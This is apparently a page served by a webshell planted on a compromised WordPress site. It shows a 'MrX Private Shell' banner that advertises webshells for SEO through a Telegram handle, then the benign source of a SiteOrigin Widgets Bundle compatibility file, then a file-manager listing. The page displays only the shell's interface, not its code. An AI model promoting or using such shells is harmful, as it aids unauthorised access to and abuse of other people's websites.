����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
class SiteOrigin_Widgets_Bundle_Compatibility {
const BEAVER_BUILDER = 'Beaver Builder';
const ELEMENTOR = 'Elementor';
const VISUAL_COMPOSER = 'Visual Composer';
/**
* Get the singleton instance
*
* @return SiteOrigin_Widgets_Bundle_Compatibility
*/
public static function single() {
static $single;
return empty( $single ) ? $single = new self() : $single;
}
function __construct() {
$builder = $this->get_active_builder();
if ( ! empty( $builder ) ) {
require_once $builder['file_path'];
}
if ( function_exists( 'register_block_type' ) ) {
require_once plugin_dir_path( __FILE__ ) . 'block-editor/widget-block.php';
}
// These actions handle alerting cache plugins that they need to regenerate a page cache.
add_action( 'siteorigin_widgets_stylesheet_deleted', array( $this, 'clear_page_cache' ) );
add_action( 'siteorigin_widgets_stylesheet_added', array( $this, 'clear_page_cache' ) );
add_action( 'siteorigin_widgets_stylesheet_cleared', array( $this, 'clear_all_cache' ) );
if (
function_exists( 'amp_is_enabled' ) &&
amp_is_enabled()
) {
// AMP plugin is installed and enabled. Remove Slider Lazy Loading.
add_filter( 'siteorigin_widgets_slider_attr', function( $attr ) {
if ( ! empty( $attr['class'] ) ) {
$attr['class'] = str_replace( ' skip-lazy', '', $attr['class'] );
}
$attr['loading'] = false;
return $attr;
} );
}
}
function get_active_builder() {
$builders = include_once 'builders.php';
foreach ( $builders as $builder ) {
if ( $this->is_builder_active( $builder ) ) {
return $builder;
}
}
return null;
}
function is_builder_active( $builder ) {
switch ( $builder[ 'name' ] ) {
case self::BEAVER_BUILDER:
return class_exists( 'FLBuilderModel', false );
break;
case self::ELEMENTOR:
return class_exists( 'Elementor\\Plugin', false );
break;
case self::VISUAL_COMPOSER:
return class_exists( 'Vc_Manager' );
break;
}
}
/**
* Tell cache plugins that they need to regenerate a page cache.
*
* @param $name The name of the file that's been deleted.
* @param $instance The current instance of the related widget.
*
*/
public function clear_page_cache( $name, $instance = array() ) {
$id = explode( '-', $name );
$id = end( $id );
$id = explode( '.', $id )[0];
if ( is_numeric( $id ) ) {
if ( function_exists( 'w3tc_flush_post' ) ) {
w3tc_flush_post( $id );
}
if ( class_exists( 'Swift_Performance_Cache' ) ) {
Swift_Performance_Cache::clear_post_cache( $id );
}
if ( class_exists( '\Hummingbird\\WP_Hummingbird' ) ) {
do_action( 'wphb_clear_page_cache', $id );
}
if ( function_exists( 'breeze_varnish_purge_cache' ) ) {
breeze_varnish_purge_cache( get_the_permalink( $id ) );
}
if ( function_exists( 'run_litespeed_cache' ) ) {
$url = parse_url( get_the_permalink( $id ) );
if ( ! empty( $url ) ) {
header( 'x-litespeed-purge: ' . $url['path'] );
}
}
if ( function_exists( 'rocket_clean_post' ) ) {
rocket_clean_post( $id );
}
}
}
/**
* Tell cache plugins that they need to regenerate their all page cache.
*/
public function clear_all_cache() {
if ( function_exists( 'w3tc_flush_all' ) ) {
w3tc_flush_all();
}
if ( class_exists( 'Swift_Performance_Cache' ) ) {
Swift_Performance_Cache::clear_all_cache();
}
if ( class_exists( '\Hummingbird\\WP_Hummingbird' ) ) {
do_action( 'wphb_clear_page_cache' );
}
if ( class_exists( 'Breeze_PurgeCache' ) ) {
Breeze_PurgeCache::breeze_cache_flush();
}
if ( function_exists( 'run_litespeed_cache' ) && ! headers_sent() ) {
header( 'x-litespeed-purge: *' );
}
if ( function_exists( 'rocket_clean_domain' ) && function_exists( 'rocket_clean_minify' ) ) {
rocket_clean_domain();
rocket_clean_minify( 'css' );
}
}
}
SiteOrigin_Widgets_Bundle_Compatibility::single();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| beaver-builder | Folder | 0755 |
|
|
| block-editor | Folder | 0755 |
|
|
| elementor | Folder | 0755 |
|
|
| visual-composer | Folder | 0755 |
|
|
| builders.php | File | 526 B | 0644 |
|
| compat.php | File | 3.85 KB | 0644 |
|
| error_log | File | 6.73 KB | 0644 |
|